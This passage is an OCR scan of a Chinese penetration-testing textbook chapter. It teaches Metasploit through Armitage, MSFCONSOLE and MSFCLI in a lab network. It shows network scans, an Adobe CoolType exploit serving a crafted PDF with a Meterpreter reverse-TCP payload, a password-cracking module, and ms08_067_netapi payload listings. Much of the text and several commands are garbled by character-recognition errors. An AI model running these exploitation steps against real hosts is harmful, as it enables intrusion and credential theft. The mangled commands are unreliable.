VM can be used to conduct security —— 


图 6.2 安装 的 Metasploitable 系统 


) 在 该 界面 单 击 “开启 此 虚拟 机 ”按钮 或 轿 按 钮 ， 启 动 Metasploitable 系统 。 
6.2 Metasploit 基础 


Metasploit Jé — aK JT US IT] ZER TA A LH... EA DA BA RN E Te, EDs 
i8 ES AXE DE. FAP RE PET EEA, PEPE TIEN EU TR SP IK 
接触 Metasploit 渗透 测试 框架 软件 MSF》 时， 可 能 会 被 它 提供 如 此 多 的 接口 、 选 项 、 变 
量 和 模块 所 宕 撼 ， 而 感觉 无 所 适 从 。Metasploit 软件 为 它 的 基础 功能 提供 了 多 个 用 户 接口 ， 
包括 终 站 、 命 令 行 和 图 形 化 界面 等 。 本 蔬 将 介绍 Metasploit 下 各 种 接口 的 使 用 方法 。 


6.2.1 Metasploit 的 图 形 管 理工 具 Armitage 


Armitage 组 件 是 Metasploit 框架 中 一 个 完全 交互 式 的 图 形 化 用 户 接口 ， 由 Raphael 
Mudge 所 开发 。Armitage 工具 包含 Metasploit 控制 台 ， 通 过 使 用 其 标签 特性 ， 用 户 可 以 看 
到 多 个 Metasploit 控制 台 或 多 个 Meterpreter 会 话 。 

使 用 Armitage 工具 。 有 具体 操作 步骤 如 下 所 示 。 

(1) 启动 Metasploit 服务 。 在 使 用 Armitage 工具 前 ， 必 须 将 Metasploit Jl 29/27]. E 
则 ， 无 法 运行 Armitage 工具 。 因 为 Armitage 需要 连接 到 Metasploit 服务 ， 才 可 以 局 动 。 在 
Kali 果 面 依次 选择 “应 用 程序 ”IKali Linux|“ 系统 服务 ”|Metasploitlcommunity/pro start 命 
^ JAZ Metasploit 服务 ， 将 输出 如 下 所 示 的 信息 : 
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[ ok ] Starting PostgreSQL 9.1 database server: main. 

Configuring Metasploit... 

Creating metasploit database user 'msf3'... 

Creating metasploit database 'msf3'... 

insserv: warning: current start runlevel(s) (empty) of script metasploit’ overrides LSB defaults (2 3 
4 5). 

insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script metasploit' overrides LSB 
defaults (0 1 6). 


从 输出 的 信息 中 可 以 看 到 PostgreSQL 9.1 数据 库 服 务 已 启动 ， 并 创建 了 数据 库 用 户 和 
数据 库 。 

(2) 启动 Armitage 工具 。 在 Kali RKR “HFEF” [Kali Linux| “漏洞 利用 工 
具 集 ”|“ 网 络 漏洞 利用 ”|armitage 命令 ， 如 图 6.3 PAN. BER imír armitage 命令 局 
动 Armitage 工具 ， 如 下 所 示 : 


root@kali:~# armitage 


EN Top 10 Security Tools 
m^ > 
dil 办 公 OL 信息 收集 


》 
f f ”Ag RRAN > 
+) 电子 ” Web 程 序 > 
Go 附件 ”7 密码 攻击 ? 
© 互联 网 ” 部 无 线 攻击 
@ 通用 访问 漏洞 利用 工具 集 J KÉ BeEF XSS Framework 
A 图 形 ' dd 响 探 欺骗 > € cisco 攻 击 
( 系统 工具 'Q snas > Kd Exploit Database > 
G vise ’ @ ware > b Exploit Development Tools 
E rs > de 压力 测试 > d Metasploit j 


ho 
m RE 


> 
L3 硬件 Hacking > EÉ Social Engineering Toolkit > 
ty 数字 到 3 
El EIEN exploitó 


qT FR ARF EN ikat 
` jboss-autopwn-linux 
` jboss-autopwn-win 


Eu termineter 


图 6.3 Jaa) armitage 界面 


(3) JAZ) armitage 工具 后 ， 将 显示 如 图 6.4 所 示 的 界面 。 
(4) 在 该 界面 显示 了 连接 Metasploit 服务 的 基本 信息 。 在 该 界面 单 击 Connect 按钮 ， 
将 显示 如 图 6.5 所 示 的 界面 。 


LJ | 
Connect... = | TF | X | 
Host 127.0.01 Start Metasploit? x 
Pont 33533 A Metasploit RPC server isnot running or 
_ not accepling connections yet. Would you 
User mist 


| ke me to start Metasploit's RPC server 


? 
(hives eee for you! 
| Cannect | | Help | 


— 


k 


图 6.4 连接 Metasploit 界面 图 6.5 JAZ) Metasploit 


(5) 该 界面 提示 是 否 要 局 动 Metasploit 的 RPC 服务 。 单 击 “ 是 (Y)” 按 钮 ， 将 显示 如 
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图 \6.6 所 示 的 界面 。 
(6) 该 界面 显示 了 连接 Metasploit 的 一 个 进度 。 当 成 功 连接 到 Metasploit 服务 的 话 ， 


将 显示 如 图 6.7 所 示 的 界面 。 


Armitage - | 口 x | 
Armitage View Hosts Attacks Workspaces Help 
» (ii auxiliary 
> (Bj exploit 
| > (Bii payload 
HE... x rns A 


Fnnnerting th 127 N A 155353 


0 java.net.ConrectCeception: TE 3E Ht ay 
— - | Console X | 


RUE 


L3 


图 6.6 连接 Metasploit 界面 图 6.7 Armitage 初始 界面 


CI) 该 界面 共有 三 个 部 分 ， 这 里 把 它们 分 别 标记 为 A、B 和 C。 下 面 分 别 介绍 这 三 部 分 。 
O A: 这 部 分 显示 的 是 预 配置 模块 。 用 户 可 以 在 模块 列表 中 使 用 空格 键 搜索 提供 的 模块 。 
Q B: 这 部 分 显示 活跃 的 日 标 系 统 ， 用 户 能 执行 利用 产科 攻击 。 
L] C: 这 部 分 显示 多 个 Metasploit 标签 。 这 样 ， 就 可 以 运行 多 个 Meterpreter 命令 或 控 
制 台 会 话 ， 并 且 同 时 显示 。 

【实例 6-1】 演示 使 用 Armitage 工具 做 渗透 测试 。 具 BA 

体操 作 步 骤 如 下 所 示 。 es Enter scan range (e.g. 192.168.1.0/24): 
(1) 局 动 Armitage LTH, ent FEIR. MIZA ——— 

面 可 以 看 到 默认 没有 扫描 到 任何 主机 。 这 里 通过 扫描 ， 找 一 一 
到 本 网 络 中 的 所 有 主机 。 
(2 ) 在 marr 工具 的 菜单 柱 中 依次 选择 Hosts|Nmap 图 68 输入 扫描 范围 

Scan|Quick Scan 命令 ， 将 显示 如 图 6.8 所 示 的 界面 。 
(3) 在 该 界面 输入 要 扫 搬 的 网 络 沁 围 ， 这 里 输入 的 网 络 范 围 是 192.168.41.0/24。 然 后 
蛙 击 “确定 ” 控 钮 ， 将 开始 扫 手 。 扫 摘 完 成 后 ， 将 显示 如 图 6.9 所 示 的 界面 。 


Armitage View Hosts Attacks Workspaces Help 
» lini auxiliary 
» (Bg exoloit 
> 窗 payload 
> ini post 


| 192.168.41.1 192.168.41.2 


- € Sean Complete! 
nmap, X Use Attacks >Find Attacks to suggest 
Nmap: MAC Address: 00:0C:29:83:AC:BD (Y applicable exploits For your targets. 
Nmap: Nmap scan report for 192.168.41.1 
Nmap: Host is up (0.000585 latency). AT 
Nmap: All 100 scanned ports on 192.168.4 
Nmap: MAC Address: 00:0C:29:72:B3:35 (VMware) 


Nmap: Nmap scan report for 192.168.41.254 
Nmap: Host is up (0.00014s latency). 
Nmap: All 100 scanned ports on 192.168.41.254 are filtered 


Nmap: MAC Address: 00:50:56:F3:FF:64 (VMware) 

Nmap: Nmap scan report Tor 192.168.41.235 

Nmap: Host is up (0.00000405 latency). 

Nmap: All 100 scanned ports on 192.168.41.235 are closed 


st > 


图 6.9 ”扫描 结果 
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(4 站 从 该 界 面 可 以 看 到 ， 弹 出 了 一 个 扫 揪 完成 对 话 框 ， 此 时 单 击 “确定 ” 控 钮 即 可 。 
并 和 在 目标 系统 的 窗口 中 ， 显 示 了 三 台 主 机 。 这 三 台 主 机 残 是 扫描 到 的 主机 。 从 扫 摘 完 
的 对 话 框 中 可 以 看 到 提示 建议 选择 Attacks|Find Attacks 售 令 ， 将 可 以 渗透 攻击 目标 系统 。 

(50 在 沫 单 栏 中 依次 选择 Attacks|Find Attacks 命令 ， 运行 完 后 将 显示 如 图 6.10 所 示 的 
Ff. 


消息 


Attack Analysis Complete... 


You will now see an 'Attack' menu attached 
to each host in the Targets window. 


Happy hunting! 


图 6.10 消息 


(6) 从 该 界面 可 以 看 到 攻击 分 析 完 成 ， 并 且 右 击 扫 插 到 的 主机 将 会 看 到 有 一 个 Attack 
XR, WE 6.11 Aras. 


Armitage 


Armitage View Hosts Attacks Workspaces Help 


> ^ auxiliary 
Ema | 
» m payload d 


> post 


Attack 
Login > 


activecollab_chat 


realserver ajaxplorer_checkinstall_exec 


Services 


samba apprain_upload_exec 


1.16 Scan 


webapp 
wyse 


auxilium, upload exec 


v Y" Y "B 


Host 


contentkeeperweb mimencode 


cw 


Nmap: Host is up (0.000595 latency). 

Nmap: All 100 scanned ports on 192.168.41.156 are closed 
Nmap: MAC Address: 00:0C:29:83:AC:BO (VMware) 

Nmap: Nmap scan report for 192.168.41.170 


cuteflow upload, exec 


extplorer upload exec 


familycms less exec 


freenas exec raw 


gitorious graph 


More... 


Nmap: Host is up (0.000S58s latency). 

Nmap: All 100 scanned ports on 192.168.41.170 are closed 
Nmap: MAC Address: 00:0C:29:72:B3:35 (VMware) 

Nmap: Nmap scan report for 192.168.41.254 


Nmap: Host is up (0.00014s latency). 
Nmap: All 100 scanned ports on 192.168.41.254 are filtered 
Nmap: MAC Address: 00:50:56:F3:FF:6A (VMware) 


Nmap: Nmap scan report for 192.168.41.235 


Nmap: Host is up (0.0000040s latency). 
Nmap: All 100 scanned ports on 192.168.41.235 are closed 
Nmap: Nmap done: 256 IP addresses (7 hosts up) scanned in 4.08 seconds 


msi > 


图 6.11 Attack 菜单 


(7) 从 该 界面 可 以 看 到 在 目标 主机 的 沫 单 中 出 现 了 Attack 选项 ， 在 该 菜单 中 共有 五 个 
选项 。 在 没有 运行 Find Attacks 命令 前 ， 只 要 Services, Scan 和 Host 三 个 选项 。 这 里 扫 摘 
到 的 主机 屏幕 都 是 黑色 ， 这 是 因为 还 没有 识别 出 操作 系统 的 撩 型 。 此 时 可 以 在 菜单 栏 中 依 
次 选择 Hosts|Nmap Scan|Quick Scan (OS detect) 命令 ， 扫 描 操 作 系 统 类 型 。 扫 描 完 成 后 ， 
将 显示 操作 系统 的 默认 图 标 。 

(8) 扫描 操作 系统 。 扫 描 完成 后 ， 将 显示 如 图 6.12 所 示 的 界面 。 


aig 


第 6 章 漏洞 利用 


Armitage 


Armitage View Hosts Attacks Workspaces Help 
> 篇 auriliary 
> | payload | 
> (iil post 


i | 192.168.41.1 192.168.41.2 192.168.41.146 


[Console x | nmap x | nmap x | nmap x [nmap.x 
Nmap: 5000/tcp open http-proxy sslstrip 
Nmap: MAC Address: 00:0C:29:48:66:40 (VMware) 
Nmap: Device type: general purpose 
Nmap: Running: Microsoft Windows 2000| XP 
Nmap: OS CPE: cpe:/o:microsoft:windows 2000::- cpe:/o:microsoft:windows_2000::sp1 
cpe:/o:microsoft:windows 2000::5p2 cpe:/o:microsoft:windows 2000::5p3 
cpe:/o:microsoft:windows 2000::5p4 cpe:/o:microsoft:windows xp::- 
cpe:/o:microsoft:windows_xp::sp1 

Nmap: OS details: Microsoft Windows 2000 SPO - SP4 or Windows XP SPO - SP1 

Nmap: Network Distance: 1 hop 

Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 

Nmap: OS and Service detection performed. Please report any incorrect results at 
http://nmap.org/submit/ . 


Nmap: Nmap done: 1 IP address (1 host up) scanned in 7.71 seconds 


图 6.12 dij RS 


(9) Mig Ft a) AHAHA REN, RRE TEM. Wu] Dae PA bs, 
进行 渗透 攻击 。 

C10) 此 时 ， 可 以 在 预 配置 模块 窗口 选择 模块 渗透 攻击 目标 系统 ， 如 选择 渗透 攻击 浏 
览 器 模块 。 在 预 配置 模 块 中 依次 选择 exploit|windows|browser|adobe cooltype sing 模块 ， 双 
ili adobe cooltype sing 模块 ， 将 显示 如 图 6.13 所 示 的 界面 。 


windows/browser/adobe-cooltype-sing | 


Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow 


This module exploits à vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 
8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well. 


Option A | Value 
DisablePayloadHandler false 
ExitOnSession false 

LHOST 192.168.41.235 
LPORT 8107 

PAYLOAD + windows/meterpreter/reverse Lcp 
SRVHOST 0.0.0.0 
SRVPORT 8080 

SSL 0 

SSLCert 

SSL Version SSL3 

URIPATH 


Targets: | 0 => Automatic M 


[L] Show advanced options 


—— 


图 6.13 ”模块 配置 选项 


(11) 该 界面 显示 了 adobe cooltype sing 模块 的 默认 配置 选项 信息 。 这 些 选 项 的 默认 
如 图 6.14 所 示 的 界面 。 
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Armitage 


Armitage View Hosts Attacks Workspaces Help 


> (Bj backupexec |å 


> brightstor 
v = browser 


[* adobe flash - 
[F] adobe flash o 
[* adobe flash riw 


cr 


| Console X | nmap x | windows/browser/adobe_cooltype.sing x | 


msf exploit{ ) > set PAYLOAD windows/meterpreter/reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 
msf exploit ) > set TARGET 0 
TARGET => 0 
msf exploit ) > set SRVHOST 0.0.0.0 
SRVHOST => 0.0.0.0 
msf exploit ) > set ExitOnSession false 
ExitOnSession => false 
mst exploitf ) > exploit -| 
Exploit running as background job. 
Started reverse handler on 192.168.41.235:8684 
Using URL: http://0.0.0.0:8080/]EdB20ma7AEGV7G 
Local IP: http://192.168.41.235:8080/]|EdB20ma7AEGV7G 
Server started. 
msf exploit( ] > 


图 6.14 渗透 攻击 结果 


(12) 从 该 界面 可 以 看 到 ， 使 用 adobe cooltype sing 模块 渗透 攻击 的 过 程 。 从 最 后 的 
信息 中 可 以 看 到 ， 渗 透 攻 击 成 功 运行 。 以 后 茶 台 主机 访问 http://192.168.41.235:8080/ 
JEdB2oma7AEGV7G 链接 时 ,将 会 在 目标 主机 上 创建 一 个 名 为 下 dB2oma7AEGV7G 的 PDF 
文件 .只 要 有 目标 主机 访问 该 链接 , Armitage 控制 台 会 话 中 将 会 显示 访问 的 主机 , 如 图 6.15 
所 示 。 


Armitage 


Armitage View Hosts Attacks Workspaces Help 


> (ii backupexec a 


> Ir brightstor CO o | 
M = browser À i 


[5 adobe flash - | 
[P] adobe flash o 
[F adobe flash riw 192.168.41.1 192.168.41.2 192.168.41.146 


window s/browser/adobe_cooltype sing X 


msf exploit ] > set ExitOnSession false 
ExitOnSession => false 
msf exploit ) > exploit -j 
Exploit running as background job. 
Started reverse handler on 192.168.41.235:8684 
Using URL: http://0.0.0.0:8080/]EdB20ma7AEGV7G 
Local IP: http://192.168.41.235:8080/]EdB20ma7AEGV7G 
Server started. 


[*] 192.168.41.146 adobe cooltype sing - Request from browser: Mozilla/4.0 (compatible; MSIE 6.0; 
Windows NT 5.1) 


192.168.41.146 adobe cooltype sing - Sending crafted PDF 


192.168.41.146 adobe cooltype sing - Request from browser: Mozilla/4.0 (compatible; MSIE 6.0; 
Windows NT 5.1) 


192.168.41.146 adobe cooltype sing - Sending crafted PDF 
mst exploit 


图 6.15 攻击 信息 


(13) 从 该 界面 可 以 看 到 主机 192.168.41.146, 访问 了 http://192.168.41.235:8080/ 
JEdB2oma7AEGV7G 链接 。 并 且 ， 可 以 看 到 在 主机 192.168.41.146 上 创建 了 PDF 文件 。 
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6.2.2 控制 Metasploit im (MSFCONSOLE) 


MSF 终端 — 1 是 目前 Metasploit 框架 最 为 流行 的 用 户 接口 ， 而 且 也 是 

非常 灵活 的 。 因 为 MSF im Metasploit 框架 中 最 灵活 、 功 能 最 丰 军 及 文 持 最 好 的 工具 之 

一 。MSFCONSOLE a 于 管理 Metasploit 数据 库 ， 管 理会 话 、 配 置 并 启动 Metasploit 

模块 。 本 质 上 来 说 ， 瓯 是 为 了 利用 漏洞 ，MSFCONSOLE 将 获取 用 户 连 接 到 主机 的 信息 ， 

以 至 于 用 户 能 局 动 渗透 攻击 目标 系统 。 本 小 节 将 介绍 Metasploit in (oMSFCONSOLE) 。 
当 使 用 — 控制 台 时 ， 用 户 将 使 用 一 些 通 用 的 命令 ， 如 下 所 示 。 

help: 该 命令 令 允 评 用 户 但 看 执行 命令 的 帮助 信息 。 

use module: 该 命令 pagent 加 载 选 择 的 模块 。 

set optionname module: 该 命令 允许 用 户 为 模块 设置 不 同 的 选项 。 

run: 该 命令 用 来 局 动 一 个 非 渗透 攻击 模块 。 

search module: 该 命令 允许 用 户 搜索 一 个 特定 的 模块 。 

exit: 该 命令 允许 用 户 退 出 MSFCONSOLE。 

MSFCONSOLE 漏洞 利用 的 具体 操作 步骤 如 下 所 示 。 

(1) Æ ima MSFCONSOLE， 执 行 命 令 如 下 所 示 : 


root@kali:~# msfconsole 


执行 以 上 命令 后 ， 输 出 信息 如 下 所 示 : 


OoOoococoo 


+------------------------------------------------------- ar 

| METASPLOIT by Rapid | 
+----------------------------++--------------------------- + 

| | | 
| ==C( (o( CQ | [rmm [zzzzzcpeek | 

| )=\ || EXPLOIT | | 

| AN \ | 

| // \\ | |==[msf >]============\ | 

| II \\ Me 7 

| hi pd | | «e)y«eyeyeyeyeye)y | | 
十 一 一 一 一 一 -一 一 一 一 一 一 一 一 +--—---------—---_--_________. + 

| oOo | YYW | 

| oQ | )======( | 

| [e] | LOOT ^ | 

| iah | MR | / hs \ | 

| | PAYLOAD p e / CIL. A | 

|| | Ik) | | 

| (@X@) «eye " | i | 
ere d NEN "E 


Easy phishing: Set up email templates, landing pages and listeners 
in Metasploit Pro's wizard -- type 'go pro' to launch it now. 
=[ metasploit v4.8.2-2014010101 [core:4.8 api: 1.0] 
* -- ---[ 1256 exploits - 762 auxiliary - 212 post 
+ -- --=[ 324 payloads - 32 encoders - 8 nops 
msf > 


输出 的 信息 出 现 ms 仑 提示 人 符 ， 表 示 登 录 MSFCONSOLE 成 功 。 此 时 就 可 以 在 该 命令 
运行 其 他 任何 命令 。 
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(2) 1E H] search 命令 搜索 所 有 有 效 的 Linux 模块 。 对 于 模块 用 户 每 次 想 要 执行 一 个 动 
Mg; 这 是 一 个 很 好 的 主意 。 主 要 原因 是 Metasploit 各 种 版 本 之 间 ， 模 块 的 路 径 可 能 有 改变 。 
执行 命令 如 下 所 示 : 


msf> search linux 
执行 以 上 命令 后 ， 输 出 信息 如 下 所 示 : 
Matching Modules 


Name Disclosure Date Rank Description 


Remote Command Execution 
auxiliary/analyze/jtr_linux 

Linux Password Cracker 
auxiliary/analyze/jtr_unshadow 

Utility 
auxiliary/dos/wifi/netgear_ma521_rates 

Wireless Driver Long Rates Overflow 
auxiliary/dos/wifi/netgear_wg311pci 

Wireless Driver Long SSID Overflow 


normal John the Ripper 


normal Unix Unshadow 
normal NetGear MA521 


normal NetGear WG311v1 


auxiliary/scanner/http/atlassian_crowd_fileaccess normal Atlassian Crowd 
XML Entity Expansion Remote File Access 
auxiliary/scanner/http/hp sitescope getfileinternal fileaccess normal HP SiteScope 
SOAP Call getFilelnternal Remote File Access 
auxiliary/scanner/http/hp sitescope getsitescopeconfiguration normal HP SiteScope 
SOAP Call getSiteScopeConfiguration Configuration Access 
auxiliary/scanner/http/hp sitescope loadfilecontent fileaccess normal HP SiteScope 
SOAP Call loadFileContent Remote File Access 
oe 省 略 部 分 内 容 
post/multi/manage/play_youtube normal Multi Manage YouTube Broadcast 
post/multi/manage/record_mic normal Multi Manage Record Microphone 
post/multi/manage/sudo normal Multiple Linux / Unix Post Sudo Upgrade Shell 
post/multi/manage/system_session normal Multi Manage System Remote TCP Shell 
Session 
post/pro/multi/agent normal Metasploit Pro Persistent Agent 
post/pro/multi/agent_cleaner normal Metasploit Pro Persistent Agent Cleaner 
post/pro/multi/gather/hashdump normal Pro: Multi Gather Hashdump 
post/pro/multi/gather/sysinfo normal Unix Gather System Info 
post/pro/multi/macro normal Metasploit Pro Post Exploitation Macro Launcher 


post/windows/manage/pxexploit normal Windows Manage PXE Exploit Server 


输出 的 信息 就 是 Metasploit 中 所 有 有 效 的 模块 。 输 出 的 信息 显示 为 4 列 ， 分 别 表示 模 
块 名 称 、 公 开 时 间 、 等 级 及 捅 述 。 以 上 输出 的 内 容 较 多 ， 但 是 由 于 篇 幅 的 原因 ， 这 里 只 列 
出 了 一 少 部 分 内 容 ， 省 略 的 内 容 使 用 省 略 号 C.) GR. 

(3) 使 用 John Ripper linux 密码 破解 模块 。 执 行 命令 如 下 所 示 : 

msf > use auxiliary/analyze/jtr_linux 

msf auxiliary(jtr_linux) > 

输出 的 信息 表示 已 加 载 jtr_ linux 模块 。 

(4) 但 看 模块 的 有 效 选 项 。 执 行 命 令 如 下 所 示 : 
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msf auxiliary(jtr linux) > show options 
Module options (auxiliary/analyze/jtr_linux): 


Name Current Setting Required Description 

Crypt false no Try crypt() format hashes(Very Slow) 

JOHN_BASE no The directory containing John the Ripper (src, 
run, doc) 

JOHN_PATH no The absolute path to the John the Ripper 
executable 

Munge false no Munge the Wordlist (Slower) 

Wordlist no The path to an optional Wordlist 


msf auxiliary(jtr_linux) > 


从 输出 结果 中 可 以 看 到 jtr linux 模块 有 5 个 有 效 的 选项 ， 如 Crypt. JOHN BASE, 
JOHE PATH, Munge 和 Wordlist。 在 输出 的 信息 中 ， 对 这 5 个 选项 分 别 有 详 细 的 描述 。 

(5) 现在 用 户 有 一 个 选项 的 列表 ， 这 些 选 项 为 运行 jia linux 模块 。 用 户 能 设置 独特 的 
选项 ， 使 用 set 命令 。 设 置 JOHN PATH 选项 ， 如 下 所 示 : 


msf  auxiliary(jtr linux) > set JOHN PATH /usrshare/metasplolt- framework/data/john/ 
wordlists/password.lst 


JOHN PATH => /usr/share/metasploit-framework/data/john/wordlists/ password.lst 
(6) 现在 运行 渗透 攻击 ， 执 行 命令 如 下 所 示 : 


msf auxiliary(jtr_linux) > exploit 
6.2.3 控制 Metasploit 命令 行 接 口 (MSFCLD 


本 小 节 将 介绍 Metasploit 命令 行 接口 (MSFCLI) 。 为 了 完成 Metasploit 的 攻击 任务 ， 
震 要 使 用 一 个 接口 。MSFCLI 刚好 实现 这 个 功能 。 为 了 学 习 Metasploit 或 测试 / 写 一 个 新 的 
渗透 攻击 ，MSFCLI 是 一 个 很 好 的 接口 。 

MSF 命令 行 和 MSF mA Metasploit 框架 访问 提供 了 两 种 蕉 然 不 同 的 途径 ，MSF 终 
器 以 一 种 用 户 友 好 的 模式 来 提供 交互 方式 ， 用 于 访问 软件 所 有 的 功能 特性 ， 而 MSFCLI 则 
主要 考虑 脚本 处 理 和 与 其 他 命令 行 工 具 的 互 操作 性 。MSFCLI 常用 的 命令 如 下 所 示 。 

O msfcli: 加 载 所 有 有 效 渗透 攻击 MSFCLI 的 列表 。 

口 msfcli -h: 查看 MSFCLI 帮助 文档 。 

Q msfcli [PATH TO EXPLOIT] [options = value]: 启动 渗透 攻击 的 语法 。 

MSF 命令 行 MSFCLI 的 使 用 如 下 所 示 。 

(1) 启动 MSF 命令 行 (MSFCLI) 。 局 动 的 过 程 需要 一 点 时 间 ， 请 耐心 等 待 ， 这 取决 
于 用 户 系 统 的 速度 。 还 要 注意 ， 随 着 MSFCLI 负载 ， 可 利用 的 有 效 列表 将 显示 出 来 。 执 行 
命令 如 下 所 示 : 


root@kali:~# msfcli 
[*] Please wait while we load the module tree... 


(2) 查看 MSFCLI 帮助 文档 。 执 行 命令 如 下 所 示 : 


root@kali:~# msfcli -h 
Usage: /opt/metasploit/apps/pro/msf3/msfcli <exploit_name> <option=value> [mode] 


Mode Description 


(A)dvanced Show available advanced options for this module 
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(AC)tions Show available actions for this auxiliary module 

(C)heck Run the check routine of the selected module 

(E)xecute Execute the selected module 

(H)elp You're looking at it baby! 

(DS Evasion Show available ids evasion options for this module 

(O)ptions Show available options for this module 

(P)ayloads Show available payloads for this module 

(S)ummary Show information about this module 

(T )argets Show available targets for this exploit module 
Examples: 


msfcli multi/handler payload=windows/meterpreter/reverse_tcp Ihost=IP E 
msfcli auxiliary/scanner/http/http version rhosts=IP encoder=post= nop= E 


以 上 输出 的 信息 显示 了 msfcli 命令 的 帮助 文档 。 通 过 查看 这 些 帮 助 文档 ， 可 以 了 解 一 


个 模块 的 使 用 说 明和 使 用 模式 列表 。 


(3) 为 了 证 明 前 面 所 说 的 帮助 文档 信息 。 这 里 将 选择 A 选项 ， 显 示 模 块 的 高 级 选项 。 


执行 命令 如 下 所 未: 


root@kali:/usr/bin# msfcli auxiliary/scanner/portscan/xmas A 
[*] Initializing modules... 


Name : GATEWAY 

Current Setting: 

Description : The gateway IP address. This will be used rather than a random remote 
address for the UDP probe, if set. 

Name : NETMASK 

Current Setting  : 24 

Description : The local network mask. This is used to decide if an address is in the local 
network. 

Name : ShowProgress 

Current Setting  : true 

Description : Display progress messages during a scan 

Name : ShowProgressPercent 

Current Setting  : 10 

Description : The interval in percent that progress should be shown 

Name : UDP SECRET 

Current Setting : 1297303091 

Description : The 32-bit cookie for UDP probe requests. 

Name > VERBOSE 

Current Setting  : false 

Description : Enable detailed status messages 

Name : WORKSPACE 

Current Setting  : 

Description : Specify the workspace for this module 


以 上 信息 显示 了 xmas 模块 的 高 级 选项 。 输 出 信息 中 对 每 个 选项 都 有 3 部 分 介绍 ， 包 
括 名 称 、 当 前 设置 及 描述 信息 。 

(4) 此 外 ， 用 户 可 以 使 用 S 模式 列 出 当前 模块 的 一 个 摘要 信息 。 这 个 摘要 模式 是 查看 
所 有 有 效 选项 的 一 个 很 好 的 方法 。 大 部 分 选项 是 可 选 的 。 但 是 为 了 使 用 户 设置 目标 系统 或 
端口 ， 通 常 有 些 选项 是 必须 的 。 启 动 摘要 模式 渗透 攻击 ， 执 行 命令 如 下 所 示 : 


root@kali:/usr/bin# msfcli auxiliary/scanner/portscan/xmas S 
[*] Initializing modules... 


Name : TCP "XMas" Port Scanner 
Module  : auxiliary/scanner/portscan/xmas 
License : Metasploit Framework License (BSD) 
Rank : Normal 
Provided by: 


"I 
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kris katterjohn <katterjohn@gmail.com> 


Basic options: 
Name Current Setting Required Description 
BATCHSIZE 256 yes The number of hosts to scan per set 
INTERFACE no The name of the interface 
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) 
RHOSTS yes The target address range or CIDR identifier 
SNAPLEN 65535 yes The number of bytes to capture 
THREADS 1 yes The number of concurrent threads 
TIMEOUT 500 yes The reply read timeout in milliseconds 
Description: 


Enumerate open|filtered TCP services using a raw "XMas" scan; this sends probes containing 
the FIN, PSH and URG flags. 

以 上 信息 为 xmas 模块 的 摘要 信息 。 这 些 信 息 包括 xmas 模块 的 名 称 、 位 置 、 许 可 证 、 
级 别 、 提 供 商 、 基 本 选项 及 摘 述 等 。 

(5) 为 显示 渗透 攻击 有 效 的 选项 列表 ， 可 以 使 用 O 模式 。 该 模式 是 用 来 配置 渗透 攻击 
模块 的 ， 每 个 渗透 攻击 模块 有 一 套 不 同 的 设置 选项 ， 也 可 能 没有 。 所 有 必须 的 选项 必须 是 
渗透 攻击 允许 执行 之 前 设置 。 从 下 面 的 输出 信息 中 , 可 以 看 到 许多 必须 的 选项 默认 已 设置 。 
如 果 是 这 样 ， 束 不 需要 更 新 这 些 选 项 值 了 ， 除 非 用 尸 想 要 修改 它 。 执 行 命令 如 下 所 示 : 


root@kali:/usr/bin# msfcli auxiliary/scanner/portscan/xmas O 
[*] Initializing modules... 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to scan per set 
INTERFACE no The name of the interface 

PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) 
RHOSTS yes The target address range or CIDR identifier 
SNAPLEN 65535 yes The number of bytes to capture 

THREADS 1 yes The number of concurrent threads 
TIMEOUT 500 yes The reply read timeout in milliseconds 


输出 的 信息 显示 了 xmas 模块 需要 的 配置 选项 ， 如 BATCHSIZE, PORTS, RHOSTS, 
SNAPLEN、THREADS fil TIMEOUT. 
(6) 用 户 可 以 使 用 EE 模式 运行 渗透 攻击 测试 。 执 行 命令 如 下 所 示 : 


root@kali:/usr/bin# msfcli auxiliary/scanner/portscan/xmas E 


【实例 6-2) 使 用 MSFCLI 演示 渗透 攻击 ， 这 里 以 ms08_067_netapi 模块 为 例 。 具 体操 
作 步 骤 如 下 所 示 。 
(1) 查看 ms08_067_netapi 模块 的 配置 参数 选项 。 执 行 命令 如 下 所 示 : 


root@kali:~# msfcli windows/smb/ms08 06/ netapi O 
[*] Initializing modules... 


Name Current Setting Required Description 

RHOST yes The target address 

RPORT 445 yes Set the SMB service port 

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) 


从 输出 的 信息 中 可 以 看 到 该 模块 有 三 个 配置 选项 ， 分 别 是 RHOST. RPORT 和 
SMBPIPE, 
(2) 查看 ms08 067 netapi 模块 中 可 用 的 攻击 载荷 。 执 行 命令 如 下 所 示 : 


信息 的 收集 及 利用 


root@kali:~# msfcli windows/smb/ms08 067 netapi RHOST=192.168.41.169 P 


[*] Initializing modules... 
Compatible payloads 


generic/custom 
PAYLOADFILE or PAYLOADSTR. 
generic/debug trap 
generic/shell bind tcp 
shell 
generic/shell reverse tcp 
shell 
generic/tight loop 
windows/dllinject/bind ipv6 tcp 
a reflective loader 
windows/dllinject/bind nonx tcp 
reflective loader 
windows/dllinject/bind tcp 
reflective loader 
windows/dllinject/reverse http 
via a reflective loader 
windows/dllinject/reverse ipv6 http 
a DLL via a reflective loader 
windows/dllinject/reverse ipv6 tcp 
DLL via a reflective loader 
windows/dllinject/reverse nonx tcp 
DLL via a reflective loader 
windows/dllinject/reverse ord tcp 
reflective loader 
windows/dllinject/reverse tcp 
reflective loader 


windows/dllinject/reverse tcp allports 


Description 


Use custom string or file as payload. Set either 


Generate a debug trap in the target process 
Listen for a connection and spawn a command 


Connect back to attacker and spawn a command 


Generate a tight loop in the target process 
Listen for a connection over IPv6, Inject a DLL via 


Listen for a connection (No NX), Inject a DLL via a 
Listen for a connection, Inject a DLL via a 
Tunnel communication over HTTP, Inject a DLL 
Tunnel communication over HTTP and IPv6, Inject 


Connect back to the attacker over IPv6, Inject a 
Connect back to the attacker (No NX), Inject a 
Connect back to the attacker, Inject a DLL via a 


Connect back to the attacker, Inject a DLL via a 


Try to connect back to the attacker, on all possible 


ports (1-655395, slowly), Inject a DLL via a reflective loader 


windows/dllinject/reverse tcp dns 
